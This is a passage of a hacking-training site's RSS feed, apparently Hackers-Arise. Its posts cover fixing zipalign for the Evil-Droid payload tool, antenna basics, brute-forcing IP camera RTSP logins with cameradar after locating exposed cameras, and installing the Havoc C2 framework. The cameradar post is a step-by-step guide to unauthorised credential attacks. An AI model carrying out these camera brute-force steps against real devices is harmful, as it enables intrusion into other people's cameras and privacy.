  973. <p style="text-align: justify;"><span style="color: #374151;">To solve this issue, we will need to execute a series of commands, which you will see below.</span></p>
  974. <p><br /></p>
  975. <p style="text-align: justify;"><span style="color: #E51932;"><strong>Step Nº 1</strong></span></p>
  976. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>sudo nano /etc/apt/sources.list</strong></span></span></p>
  977. <p><br /></p>
  978. <p style="text-align: justify;"><span style="color: #E51932;"><strong>Step N º2</strong></span><span style="color: #374151;"> </span></p>
  979. <p style="text-align: justify;"><span style="color: #374151;">Once inside the configuration file, you will need to make the following changes:</span></p>
  980. <p><br /></p>
  981. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>#deb </strong></span></span><u><a href="http://.kali.org./kali" target="_blank"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>http://.kali.org./kali</strong></span></span></a></u><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong> kali-rolling main contrib non-free non-free-firmware</strong></span></span></p>
  982. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>deb </strong></span></span><u><a href="http://ftp.de.debian.org/debian" target="_blank"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>http://ftp.de.debian.org/debian</strong></span></span></a></u><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong> buster main</strong></span></span></p>
  983. <p><br /></p>
  984. <p><br /></p>
  985. <figure><img src="https://static.wixstatic.com/media/6a4a49_0c53ab59729b4f8fa8f7513685e00711~mv2.png/v1/fit/w_741,h_124,al_c,q_80/file.png"></figure>
  986. <p><br /></p>
  987. <p style="text-align: justify;">then <span style="color: #000000;"> </span>you can save and exit:</p>
  988. <p><br /></p>
  989. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>ctrl + g + enter</strong></span></span></p>
  990. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>ctrl + x + enter</strong></span></span></p>
  991. <p><br /></p>
  992. <p style="text-align: justify;"><span style="color: #E51932;"><strong>Step Nº 3</strong></span></p>
  993. <p><br /></p>
  994. <p style="text-align: justify;"><span style="color: #374151;">Now, execute the following commands:</span></p>
  995. <p><br /></p>
  996. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>sudo apt - -purge remove zipalign</strong></span></span></p>
  997. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>sudo apt update</strong></span></span></p>
  998. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>sudo apt install zipalign</strong></span></span></p>
  999. <p><br /></p>
  1000. <p><span style="color: #374151;">And that is it after all these adventures, you should be able to run your Evil-Droid without any issues until next time.</span></p>
  1001. <p><br /></p>
  1002. <p style="text-align: justify;"><em><strong>Smouk out!</strong></em></p>
  1003. <p><br /></p>
  1004. <p style="text-align: justify;"><em>If you liked what you saw, you might be interested in our </em><em><strong>Hacking Android course</strong></em><em>, part of our </em><em><strong>Subscriber PRO </strong></em><em>training.</em></p>
  1005. <p><br /></p>
  1006. <figure><img src="https://static.wixstatic.com/media/6a4a49_dec5239eb07448acbb4bc3694fc9407f~mv2.jpg/v1/fit/w_600,h_200,al_c,q_80/file.png"></figure>
  1007. <p><br /></p>
  1008. <p><br /></p>
  1009. <p><br /></p>]]></content:encoded></item><item><title><![CDATA[Radio Basics for Hackers, Part 4: How  Antennas Work and Which are Most Effective]]></title><description><![CDATA[Welcome back, my aspiring radio hackers! Antennas are often overlooked in the grand scheme of radio hacking but they play a crucial role...]]></description><link>https://www.hackers-arise.com/post/radio-basics-for-hackers-part-4-how-antennas-work-and-which-are-most-effective</link><guid isPermaLink="false">6494bf115cb50456e4569928</guid><pubDate>Thu, 02 Nov 2023 14:46:48 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_17d21e99596447b295c9dc3dbf09722e~mv2.gif/v1/fit/w_480,h_236,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p><br /></p>
  1010. <p>Welcome back, my aspiring radio hackers!</p>
  1011. <p><br /></p>
  1012. <p>Antennas are often overlooked in the grand scheme of radio hacking but they play a crucial role in our capability to send and receive radio signals. Different antennas are optimized for different frequencies and in many cases, without a proper antenna you will likely be frustrated in your efforts.</p>
  1013. <p><br /></p>
  1014. <p>In SDR for Hackers, different tasks will require different antennas. This is why it is crucial for you to understand the basics of antenna technology.</p>
  1015. <p><br /></p>
  1016. <h2><strong>What are Antennas?</strong></h2>
  1017. <p><br /></p>
  1018. <p>Antennas are devices that convert electrical energy into radio waves and vice versa. They are essential for any radio communications, as they allow radio signals to be transmitted and received.</p>
  1019. <p><br /></p>
  1020. <p><br /></p>
  1021. <figure><img src="https://static.wixstatic.com/media/6a4a49_17d21e99596447b295c9dc3dbf09722e~mv2.gif/v1/fit/w_480,h_236,al_c,q_80/file.png"></figure>
  1022. <p>
  1023. An antenna works by creating an electric field and a magnetic field. These fields are perpendicular to each other and they oscillate at the same frequency as the radio signal. The oscillating fields radiate radio waves across the air and space.</p>
  1024. <p>
  1025. When a radio wave hits an antenna, it induces an electric current in the antenna. This current is then amplified and processed by a radio receiver. The length of an antenna is important because it determines the frequency of the radio waves that it can radiate. The shorter the antenna, the higher the frequency of the radio waves.</p>
  1026. <p><br /></p>
  1027. <p>There are many befits of using antennas including:
  1028. </p>
  1029. <ul>
  1030.  <li><p><strong>Increased range:</strong> Antennas can increase the range of a radio signal by allowing it to be transmitted over longer distances.</p></li>
  1031.  <li><p><strong>Reduced noise:</strong> Antennas can reduce noise by focusing the signal in a particular direction.</p></li>
  1032.  <li><p><strong>Improved signal quality:</strong> Antennas can improve the signal quality by increasing the amplitude of the signal.</p></li>
  1033. </ul>
  1034. <p>
  1035. </p>
  1036. <h2><strong>Types of Antennas</strong></h2>
  1037. <h2></h2>
  1038. <p>There are many different types of antennas, but some of the most common include:
  1039. </p>
  1040. <ul>
  1041.  <li><p><strong>Dipole antennas:</strong> Dipole antennas are the simplest  type of antenna. They consist of two conductors that are equal in length  and are separated by a small distance.</p></li>
  1042. </ul>
  1043. <p><br /></p>
  1044. <figure><img src="https://static.wixstatic.com/media/6a4a49_5153844e81e7479393c54a17b7108ed0~mv2.webp/v1/fit/w_513,h_513,al_c,q_80/file.png"></figure>
  1045. <p><br /></p>
  1046. <ul>
  1047.  <li><p><strong>Yagi antennas:</strong> Yagi antennas are more complex than  dipole antennas. They consist of a dipole antenna with a number of  parasitic elements. The parasitic elements help to improve the gain of  the antenna. These type of antenna are excellent point-to-point capture and transmitting such as in Wi-Fi hacking.</p></li>
  1048. </ul>
  1049. <p><br /></p>
  1050. <figure><img src="https://static.wixstatic.com/media/6a4a49_71ad928d519843c19b9c09a3f7108a6f~mv2.png/v1/fit/w_449,h_489,al_c,q_80/file.png"></figure>
  1051. <p><br /></p>
  1052. <ul>
  1053.  <li><p><strong>Panel antennas:</strong> Panel antennas are flat antennas  that are made up of a number of radiating elements. They are often used  in cellular phones and other mobile devices.</p></li>
  1054. </ul>
  1055. <p><br /></p>
  1056. <figure><img src="https://static.wixstatic.com/media/6a4a49_8c6835265211427ca4c632b3c07f3990~mv2.jpeg/v1/fit/w_625,h_625,al_c,q_80/file.png"></figure>
  1057. <p><br /></p>
  1058. <p><strong>Parabolic antennas</strong> are an antenna that uses a parabolic reflector, a curved surface with the cross-sectional shape of a parabola, to direct the radio waves. The most common form is shaped like a dish and is popularly called a dish antenna or parabolic dish. The main advantage of a parabolic antenna is that it has high directivity. It functions similarly to a searchlight or flashlight reflector to direct radio waves in a narrow beam, or receive radio waves from one particular direction only.</p>
  1059. <p><br /></p>
  1060. <p><br /></p>
  1061. <figure><img src="https://static.wixstatic.com/media/6a4a49_8b5f326887c245a9aa90163767ae7828~mv2.webp/v1/fit/w_1000,h_918,al_c,q_80/file.png"></figure>
  1062. <p><br /></p>
  1063. <p>The operating principle of a parabolic antenna is that a point source of radio waves at the focal point in front of a paraboloidal reflector of conductive material will be reflected into a collimated plane wave beam along the axis of the reflector. Conversely, an incoming plane wave parallel to the axis will be focused to a point at the focal point. A typical parabolic antenna consists of a metal parabolic reflector with a small feed antenna suspended in front of the reflector at its focus, pointed back toward the reflector.</p>
  1064. <p><br /></p>
  1065. <p>Parabolic antennas are used in a wide variety of applications, including:</p>
  1066. <ul>
  1067.  <li><p>Satellite television</p></li>
  1068.  <li><p>Radio astronomy</p></li>
  1069.  <li><p>Cellular telecommunications</p></li>
  1070.  <li><p>Radar</p></li>
  1071.  <li><p>Wireless Internet</p></li>
  1072. </ul>
  1073. <p>They are also used in some consumer products, such as satellite dishes and Wi-Fi boosters.</p>
  1074. <p><br /></p>
  1075. <p>Some of the advantages of parabolic antennas:</p>
  1076. <ul>
  1077.  <li><p><strong>High directivity</strong>: Parabolic antennas can focus radio waves into a  narrow beam, which allows them to transmit or receive signals over long  distances.</p></li>
  1078.  <li><p><strong>Large aperture</strong>: The large surface area of a parabolic reflector  allows it to collect more radio waves, which improves the sensitivity of  the antenna.</p></li>
  1079.  <li><p><strong>Wide bandwidth</strong>: Parabolic antennas can operate over a wide range of  frequencies, which makes them versatile for a variety of applications.</p></li>
  1080. </ul>
  1081. <p><br /></p>
  1082. <p>The type of antenna that is used depends on the application. For example, dipole antennas are often used for broadcasting, while Yagi antennas are often used for point-to-point communication.</p>
  1083. <p>
  1084. </p>
  1085. <h2><strong>Radio Antenna Length</strong></h2>
  1086. <p><br /></p>
  1087. <p>The radio antenna rule on length is that the antenna should be one-half or one-quarter of the wavelength of the radio signal it is designed to transmit or receive. This is because the antenna needs to be able to efficiently radiate or receive the radio waves.</p>
  1088. <p><br /></p>
  1089. <p>For example, if the radio signal has a frequency of 100 MHz, then the wavelength of the signal is 3 meters (300,000,000 m/s / 100,000,000 cycles/s = 3m). So, the antenna should be either 1.5 meters long (half-wavelength) or 0.75 meters long (quarter-wavelength).</p>
  1090. <p><br /></p>
  1091. <p><br /></p>
  1092. <figure><img src="https://static.wixstatic.com/media/6a4a49_0c450d804dc24c31ba4ea505d60c71e5~mv2.gif/v1/fit/w_682,h_311,al_c,q_80/file.png"></figure>
  1093. <p><br /></p>
  1094. <p><br /></p>
  1095. <p>In practice, it is often not possible to make an antenna exactly one-half or one-quarter of the wavelength. In these cases, the antenna can be made shorter by using a loading coil. A loading coil is a small coil of wire that is added to the antenna. The coil increases the electrical length of the antenna, making it act as if it were longer.</p>
  1096. <p><br /></p>
  1097. <p>The length of the antenna is an important factor in the performance of the antenna. A well-designed antenna with the correct length will have good radiation efficiency and will be able to transmit or receive radio signals over a long distance.</p>
  1098. <p><br /></p>
  1099. <p>Some additional things to keep in mind about the radio antenna rule on length:</p>
  1100. <ul>
  1101.  <li><p>The antenna length rule applies to all types of radio antennas, including monopoles, dipoles, and Yagi antennas.</p></li>
  1102.  <li><p>The antenna length rule is not always exact. In some cases, the  antenna can be slightly shorter or longer than the wavelength of the  signal and still perform well.</p></li>
  1103.  <li><p>The antenna length rule is only a starting point. The actual length  of the antenna may need to be adjusted to achieve the desired  performance.</p></li>
  1104. </ul>
  1105. <p><br /></p>
  1106. <h2><strong>Summary</strong></h2>
  1107. <h2></h2>
  1108. <p>Antennas are an essential element of a well functioning radio system including our SDR for Hackers.  It is critical to understand antenna technology to select the proper antenna for the job. In some cases, a simple dipole antenna will suffice but satellite hacking will require a special panel antenna. I highly recommend a parabolic antenna for capturing and amplifying many radio signals.</p>
  1109. <h2></h2>]]></content:encoded></item><item><title><![CDATA[IP Camera Hacking: Hacking IP Cameras with Cameradar]]></title><description><![CDATA[Welcome back, my aspiring IP camera hackers! As most of you know, we have played a key role in the defense of Ukraine. Among our many...]]></description><link>https://www.hackers-arise.com/post/ip-camera-hacking-hacking-ip-cameras-with-cameradar</link><guid isPermaLink="false">63a3283d05bd641b8cc7e0cc</guid><pubDate>Wed, 01 Nov 2023 19:56:44 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_a3dc76a12c8e4d2ca3fc6760b370eca3~mv2.png/v1/fit/w_553,h_488,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p>Welcome back, my aspiring IP camera hackers!</p>
  1110. <p><br /></p>
  1111. <p style="text-align: justify;">As most of you know, we have played a key role in the defense of Ukraine. Among our many activities in defense of Ukraine is the hacking of IP cameras throughout the country. In this way, we can spy on Russian activities and war crimes. We did this at the request of the Ukraine Army starting in April 2022. </p>
  1112. <p><br /></p>
  1113. <p><u><a href="https://www.hackers-arise.com/post/the-cyberwar-vs-putin-what-we-are-doing-and-what-you-can-do-to-help" target="_blank"><span style="color: #0D12E9;">For more on Hackers-Arise activities in Ukraine check out this post. </span></a></u> </p>
  1114. <p><br /></p>
  1115. <p><u><a href="https://www.hackers-arise.com/post/we-have-successfully-accessed-many-ip-cameras-in-ukrainian-territory-to-spy-on-russian-activities" target="_blank"><span style="color: #0D12E9;">For more information on our IP camera hacking to support Ukraine, check out this post.</span></a></u> </p>
  1116. <p><br /></p>
  1117. <p><br /></p>
  1118. <figure><img src="https://static.wixstatic.com/media/6a4a49_a3dc76a12c8e4d2ca3fc6760b370eca3~mv2.png/v1/fit/w_553,h_488,al_c,q_80/file.png"></figure>
  1119. <p><br /></p>
  1120. <p><br /></p>
  1121. <p style="text-align: justify;">To hack these cameras we used multiple methods and techniques. In hacking, we often need to explore multiple methods to be successful. Persistence is a key hacker characteristic. </p>
  1122. <p><br /></p>
  1123. <p style="text-align: justify;">As hackers, of course, it is important to take a strategic approach to any target. Always use the <strong>simplest</strong> methods<strong> first</strong> before progressing to more advanced and time-consuming attack methods.</p>
  1124. <p><br /></p>
  1125. <p><br /></p>
  1126. <figure><img src="https://static.wixstatic.com/media/6a4a49_00d2ba94cd754ecfab135a833dfc8c50~mv2.png/v1/fit/w_779,h_451,al_c,q_80/file.png"></figure>
  1127. <p><br /></p>
  1128. <p><br /></p>
  1129. <p style="text-align: justify;">In our first step,  we identified the <strong>unprotected</strong> cameras using such sites as Shodan, <u><a href="https://www.hackers-arise.com/post/google-hacking-the-ultimate-list-of-google-dorks-to-find-unsecured-web-cams" target="_blank">Google</a></u>, and Censys. Next, we tried <u><a href="https://www.hackers-arise.com/post/the-default-passwords-of-nearly-every-ip-camera" target="_blank"><span style="color: #0D12E9;">default credentials</span></a></u>.  These default credentials vary by camera and manufacturer, so make certain to check our list of default credentials for nearly every camera and manufacturer. That technique yielded a few cameras. </p>
  1130. <p><br /></p>
  1131. <p style="text-align: justify;">Next, we tried to hack the cameras with weak passwords. This yielded significant results! The primary tool we used in that effort was <strong>cameradar</strong>. </p>
  1132. <p><br /></p>
  1133. <p style="text-align: justify;">In this tutorial, I will show you how to use this tool for IP camera hacking just like  we did in the Ukraine war!</p>
  1134. <p><br /></p>
  1135. <h2><strong>RTSP</strong></h2>
  1136. <p style="text-align: justify;">Before we begin to hack IP cameras, you need a bit of background in RTSP. RTSP is the protocol that most of these IP cameras use. Not all of the cameras use RTSP, but the vast majority do. Before we go any farther, we need to say that those cameras using proprietary or other protocols will not be exploitable by cameradar.</p>
  1137. <p><br /></p>
  1138. <p style="text-align: justify;"><span style="color: #292f33;">RTSP is an application-layer protocol used for commanding streaming media servers via pause and play capabilities. It thereby facilitates real-time control of the streaming media by communicating with the server — </span><span style="color: #292f33;"><strong>without actually transmitting the data itself. </strong></span></p>
  1139. <p><br /></p>
  1140. <p style="text-align: justify;"><span style="color: #292f33;">Rather, RTSP servers often leverage the Real-Time Transport Protocol (RTP) in conjunction with the Real-Time Control Protocol (RTCP) to move the actual streaming data. </span></p>
  1141. <p><br /></p>
  1142. <p style="text-align: justify;"><span style="color: #292f33;">Most IP camera use the Real-Time Streaming Protocol (RTSP) to establish and control video and audio streams. The content is delivered using Real-time Transport Protocol (RTP). RSTP does not provide any configuration of the device. That must be done using the URI and IP address. Any configuration changes must be done via the web interface.</span></p>
  1143. <p><br /></p>
  1144. <p style="text-align: justify;"><span style="color: #292f33;">Most systems support RTSP as a fallback even if they are using a different protocol such a PSIA or ONVIF</span></p>
  1145. <p><br /></p>
  1146. <p style="text-align: justify;"><span style="color: #292f33;">When a user initiates a video stream from an IP camera using RTSP, the device sends an RTSP request to the streaming server. This jump starts the setup process. </span></p>
  1147. <p><br /></p>
  1148. <p style="text-align: justify;"><span style="color: #292f33;">Subsequently, the video and audio data can then be transmitted using RTP. </span></p>
  1149. <p><br /></p>
  1150. <p style="text-align: justify;"><span style="color: #292f33;">You can think of RTSP in terms of a television remote control for media streaming, with RTP acting as the broadcast itself.</span></p>
  1151. <p><br /></p>
  1152. <p style="text-align: justify;"><span style="color: #292f33;">While similar in some ways to </span><a href="https://en.wikipedia.org/wiki/HTTP" target="_blank"><span style="color: #292f33;">HTTP</span></a><span style="color: #292f33;">, RTSP defines control sequences useful in controlling multimedia playback.</span></p>
  1153. <p><br /></p>
  1154. <p style="text-align: justify;"><span style="color: #292f33;">While HTTP is </span><a href="https://en.wikipedia.org/wiki/Stateless_server" target="_blank"><span style="color: #292f33;">stateless</span></a><span style="color: #292f33;">, RTSP has state; an identifier is used when needed to track concurrent sessions</span></p>
  1155. <p><br /></p>
  1156. <p style="text-align: justify;"><span style="color: #292f33;">Like HTTP, RTSP uses TCP to maintain an end-to-end connection and, while most RTSP control messages are sent by the client to the server, some commands travel in the other direction (i.e. from server to client).</span></p>
  1157. <p><br /></p>
  1158. <figure><img src="https://static.wixstatic.com/media/6a4a49_893c1a07281c4664b74041a42c59c638~mv2.png/v1/fit/w_611,h_116,al_c,q_80/file.png"></figure>
  1159. <p style="text-align: justify;"><a href="https://tools.ietf.org/html/rfc2326" target="_blank"><span style="color: #292f33;"><strong>RTSP uses the following commands</strong></span></a><span style="color: #292f33;">, typically sent from the client to the server, </span></p>
  1160. <p style="text-align: justify;"><span style="color: #292f33;">when negotiating and controlling media transmissions:</span></p>
  1161. <p><br /></p>
  1162. <p style="text-align: justify;"><span style="color: #292f33;"><strong>Options:</strong></span><span style="color: #292f33;">   This request determines what other types of requests the media server will accept.</span></p>
  1163. <p><br /></p>
  1164. <p style="text-align: justify;"><span style="color: #292f33;"><strong>Describe:</strong></span><span style="color: #292f33;">   A describe request identifies the URL and type of data.</span></p>
  1165. <p><br /></p>
  1166. <p style="text-align: justify;"><span style="color: #292f33;"><strong>Announce:   </strong></span><span style="color: #292f33;">The announce method describes the presentation when sent from the client to the   server and   updates the description when sent from server to client.</span></p>
  1167. <p><br /></p>
  1168. <p style="text-align: justify;"><span style="color: #292f33;"><strong>Setup:</strong></span><span style="color: #292f33;">   Setup requests specify how a media stream must be transported before a play request is   sent.</span></p>
  1169. <p><br /></p>
  1170. <p style="text-align: justify;"><span style="color: #292f33;"><strong>Play:   </strong></span><span style="color: #292f33;">A play request starts the media transmission by telling the server to start sending the   data.</span></p>
  1171. <p><br /></p>
  1172. <p style="text-align: justify;"><span style="color: #292f33;"><strong>Pause:  </strong></span><span style="color: #292f33;">Pause requests temporarily halt the stream delivery.</span></p>
  1173. <p><br /></p>
  1174. <p style="text-align: justify;"><span style="color: #292f33;"><strong>Record:</strong></span><span style="color: #292f33;">  A record request initiates a media recording.</span></p>
  1175. <p><br /></p>
  1176. <p style="text-align: justify;"><span style="color: #292f33;"><strong>Teardown: </strong></span><span style="color: #292f33;">This request terminates the session entirely and stops all media streams.</span></p>
  1177. <p><br /></p>
  1178. <p style="text-align: justify;"><span style="color: #292f33;"><strong>Redirect:</strong></span><span style="color: #292f33;"> Redirect requests inform the client that it must connect to another server by providing a   new URL for the client to issue requests to.</span></p>
  1179. <p><br /></p>
  1180. <p style="text-align: justify;"><span style="color: #292f33;">Other types of RTSP requests include ‘get parameter,’ ‘set parameter,’ and ’embedded (interleaved) binary data,’</span></p>
  1181. <p><br /></p>
  1182. <p style="text-align: justify;"><span style="color: #292f33;">Now that you have a little background in RTSP, you are ready to start cracking IP camera credentials!</span></p>
  1183. <p><br /></p>
  1184. <h2><strong>Step #1: Download and Install cameradar</strong></h2>
  1185. <p><br /></p>
  1186. <p style="text-align: justify;">Although cameradar can be run natively in Linux, I find that it works best in a docker container.</p>
  1187. <p><br /></p>
  1188. <p style="text-align: justify;">First, install docker.</p>
  1189. <p><br /></p>
  1190. <p style="text-align: justify;"><strong>kali &gt; sudo apt install docker</strong></p>
  1191. <p><br /></p>
  1192. <p style="text-align: justify;">Next, start docker with the systemctl command;</p>
  1193. <p><br /></p>
  1194. <p style="text-align: justify;"><strong>kali &gt; sudo systemctl start docker</strong></p>
  1195. <p><br /></p>
  1196. <p style="text-align: justify;">Now, download cameradar.</p>
  1197. <p><br /></p>
  1198. <p style="text-align: justify;"><strong>kali&gt; sudo git clone </strong><u><a href="https://github.com/Ullaakut/cameradar" target="_blank"><span style="color: #0D12E9;"><strong>https://github.com/Ullaakut/cameradar</strong></span></a></u><span style="color: #0D12E9;"> </span></p>
  1199. <p><br /></p>
  1200. <p style="text-align: justify;">Now, you are ready to begin to brute-force IP cameras!</p>
  1201. <p><br /></p>
  1202. <h2><strong>Step #2: Run the RTSP Credential Brute-forcer</strong></h2>
  1203. <p><br /></p>
  1204. <p style="text-align: justify;">Now that you have docker and cameradar installed, you only need to point cameradar at the IP address of the camera that you want to brute-force!</p>
  1205. <p><br /></p>
  1206. <p style="text-align: justify;">For instance, to brute force a camera at 192.168.1.101 (obviously, not an IP address of  a real camera), we would simply enter;</p>
  1207. <p><br /></p>
  1208. <p style="text-align: justify;"><strong>kali &gt; sudo docker run  ullaakut/cameradar -t 192.168.1.101</strong></p>
  1209. <p><br /></p>
  1210. <p><br /></p>
  1211. <figure><img src="https://static.wixstatic.com/media/6a4a49_5d7babe2b09e4408b9add7b9347b4e09~mv2.png/v1/fit/w_469,h_66,al_c,q_80/file.png"></figure>
  1212. <p><br /></p>
  1213. <p style="text-align: justify;">cameradar will now attempt to find a RTSP stream at one of the default RTSP ports  namely 554, 5554 and 8554. If you suspect there may be other ports with RTSP streams (you may want to run an nmap scan first), you can add them with the -p switch, such as</p>
  1214. <p><br /></p>
  1215. <p style="text-align: justify;"><strong>kali &gt; sudo docker run  ullaakut/cameradar -t 192.168.1.101 -p 9554</strong></p>
  1216. <p><br /></p>
  1217. <p><br /></p>
  1218. <h2><strong>Step #3: Using Custom Username and Password Lists</strong></h2>
  1219. <p><br /></p>
  1220. <p style="text-align: justify;">By default, cameradar uses a small username and password list of the most common usernames and passwords. It&apos;s good strategy to use these first but if they are unsuccessful, it&apos;s time to bring out the big guns!</p>
  1221. <p><br /></p>
  1222. <p style="text-align: justify;">In this context, big guns means larger and more appropriate username and password lists. From my experience hacking cameras in Ukraine and Russia, the usernames usually are simple such as admin, root, admin1, admin3, etc. This means that you can probably use the default username list but passwords vary quite a bit. That&apos;s why you should use a good password list that is appropriate for your environment (for instance, using a Spanish list in a Spanish speaking nation).</p>
  1223. <p><br /></p>
  1224. <p style="text-align: justify;">First, the password list must be json format. There are several websites that can covert your text file to json such as  <a href="https://anyconv.com/txt-to-json-converter/" target="_blank"><span style="color: #0D12E9;"><strong>https://anyconv.com/txt-to-json-converter/</strong></span></a><strong>.</strong> Your .txt file will then be appended with a json extension. So, if we were using the seclist&apos;s password list;</p>
  1225. <p><br /></p>
  1226. <p style="text-align: justify;"><strong>/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt,</strong> </p>
  1227. <p><br /></p>
  1228. <p style="text-align: justify;">I would first convert it to json format and then use that file with cameradar. It will then appear as <strong>10-million-password-list-top-1000000.json</strong>.</p>
  1229. <p><br /></p>
  1230. <p style="text-align: justify;">Now to use that password list with cameradar, you can run the following command;</p>
  1231. <p><br /></p>
  1232. <p style="text-align: justify;"><strong>kali&gt;  sudo docker run  ullaakut/cameradar -t  </strong></p>
  1233. <p style="text-align: justify;"><strong>-v /usr/share/seclists/Passwords/Common-Credentials:/tmp/dictionaries </strong></p>
  1234. <p style="text-align: justify;"><strong>-c &quot;tmp/dictionaries/10-million-password-list-top-1000000.json&quot;</strong></p>
  1235. <p style="text-align: justify;"><strong>-t 192.168.1.101</strong></p>
  1236. <p><br /></p>
  1237. <figure><img src="https://static.wixstatic.com/media/6a4a49_e7e01a5a0c5a4d0fa79272c88bb8cc9c~mv2.png/v1/fit/w_847,h_63,al_c,q_80/file.png"></figure>
  1238. <p><br /></p>
  1239. <h2><strong>Summary</strong></h2>
  1240. <p><br /></p>
  1241. <p style="text-align: justify;">Password Cracking of IP camera credentials is very similar to other remote password cracking once you become familiar with the RTSP protocol. In fact, in many ways it is easier, as it is rare  to find a lockout (limiting how many attempts you can make) on the RTSP protocol. By using a tool like cameradar, we were able to successfully access a large percentage of IP cameras with weak passwords. </p>
  1242. <p><br /></p>
  1243. <p><br /></p>
  1244. <p><br /></p>
  1245. <figure><img src="https://static.wixstatic.com/media/6a4a49_f1e90d4fda4d4e5eacb61a72eb6f298e~mv2.jpg/v1/fit/w_600,h_200,al_c,q_80/file.png"></figure>
  1246. <p><br /></p>
  1247. <p><br /></p>
  1248. <h2></h2>
  1249. <h2></h2>
  1250. <h2></h2>
  1251. <h2></h2>
  1252. <h2></h2>
  1253. <h2></h2>
  1254. <h2></h2>
  1255. <h2></h2>
  1256. <h2></h2>
  1257. <h2></h2>
  1258. <h2></h2>
  1259. <p><br /></p>
  1260. <p><br /></p>
  1261. <p><br /></p>]]></content:encoded></item><item><title><![CDATA[Command &#38; Control Series Part I (Installing your own C2 Server on Kali Linux)]]></title><description><![CDATA[This series of posts is designed to guide you through setting up your own Command and Control (C2) server, specifically using the Havoc...]]></description><link>https://www.hackers-arise.com/post/command-control-series-part-i-installing-your-own-c2-server-on-kali-linux</link><guid isPermaLink="false">64f130ecbc16023453bbb201</guid><pubDate>Tue, 31 Oct 2023 14:00:32 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p><br /></p>
  1262. <figure><img src="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png"></figure>
  1263. <p><br /></p>
  1264. <p><br /></p>
  1265. <p style="text-align: justify;"><span style="color: #000000;">This series of posts is designed to guide you through setting up your own Command and Control (C2) server, specifically using the Havoc C2 Framework. Before diving into the technical aspects, let&apos;s first establish what a C2 server is in the context of Cyber Operations.</span>
  1266. </p>
  1267. <p style="text-align: justify;"><span style="color: #000000;">A Command and Control (C2) server is an integral element of advanced cyber-attacks, providing a mechanism for attackers to maintain communication with compromised devices post-infection. </span></p>
  1268. <p><br /></p>
  1269. <p style="text-align: justify;"><span style="color: #000000;"><strong>The architecture of C2 can be implemented in multiple ways, including but not limited to:</strong></span></p>
  1270. <ol>
  1271.  <li><p style="text-align: justify;"><span style="color: #000000;">Deploying a Remote Access Trojan (RAT) to establish a backdoor on the victim device, thereby allowing remote control.</span></p></li>
  1272.  <li><p style="text-align: justify;"><span style="color: #000000;">Employing a dedicated Command and Control server, managed by the attacker, to relay commands to compromised devices.</span></p></li>
  1273.  <li><p style="text-align: justify;"><span style="color: #000000;">Utilizing a botnet, a network of compromised devices, to execute coordinated malicious activities ranging from Distributed Denial of Service (DDoS) attacks to malware dissemination.</span></p></li>
  1274. </ol>
  1275. <p style="text-align: justify;"><span style="color: #000000;">The significance of a C2 server in cyber operations cannot be overstated. It offers attackers the capability to exfiltrate data, conduct targeted attacks, and inflict a range of damages to the victim&apos;s network.</span></p>
  1276. <p>
  1277. <span style="color: #000000;"><strong>Defensive countermeasures against C2 activities are multifaceted and include:</strong></span></p>
  1278. <ol>
  1279.  <li><p style="text-align: justify;"><span style="color: #000000;">Implementing firewalls and Intrusion Detection/Prevention Systems (IDS/IPS) to filter and block malicious traffic.</span></p></li>
  1280.  <li><p style="text-align: justify;"><span style="color: #000000;">Leveraging antivirus solutions to identify and eliminate malware components.</span></p></li>
  1281.  <li><p style="text-align: justify;"><span style="color: #000000;">Regularly updating software with the latest security patches to fend off known vulnerabilities.</span></p></li>
  1282.  <li><p style="text-align: justify;"><span style="color: #000000;">Conducting cybersecurity awareness training for staff to adhere to best practices.</span></p></li>
  1283. </ol>
  1284. <p style="text-align: justify;"><span style="color: #000000;">Though these defenses may not offer absolute protection against C2 threats, they substantially elevate the organization&apos;s security posture, making it increasingly challenging for attackers to establish a successful Command and Control infrastructure, but that&apos;s a discussion for another time.</span>
  1285. </p>
  1286. <figure><img src="https://static.wixstatic.com/media/6a4a49_f72645605bb64d61881221f629ac7373~mv2.png/v1/fit/w_831,h_300,al_c,q_80/file.png"></figure>
  1287. <p><br /></p>
  1288. <p><br /></p>
  1289. <p><span style="color: #000000;">Having made the case introductions, let&apos;s get down to business and install our first own Command and Control server and for this, we need to open a terminal in our Kali Linux distribution:</span></p>
  1290. <p><br /></p>
  1291. <p><span style="color: #E51932;"><strong>Step 1.</strong></span><strong> </strong><span style="color: #67ed1a;"><span style="background-color: #292f33;"><strong>git clone </strong></span></span><u><a href="https://github.com/HavocFramework/Havoc.git" target="_blank"><span style="color: #67ed1a;"><span style="background-color: #292f33;"><strong>https://github.com/HavocFramework/Havoc.git</strong></span></span></a></u><span style="color: #67ed1a;"><span style="background-color: #292f33;"><strong> </strong></span></span></p>
  1292. <p><br /></p>
  1293. <figure><img src="https://static.wixstatic.com/media/6a4a49_108d016b148a4c2a98756642a31f7d86~mv2.png/v1/fit/w_551,h_208,al_c,q_80/file.png"></figure>
  1294. <p><br /></p>
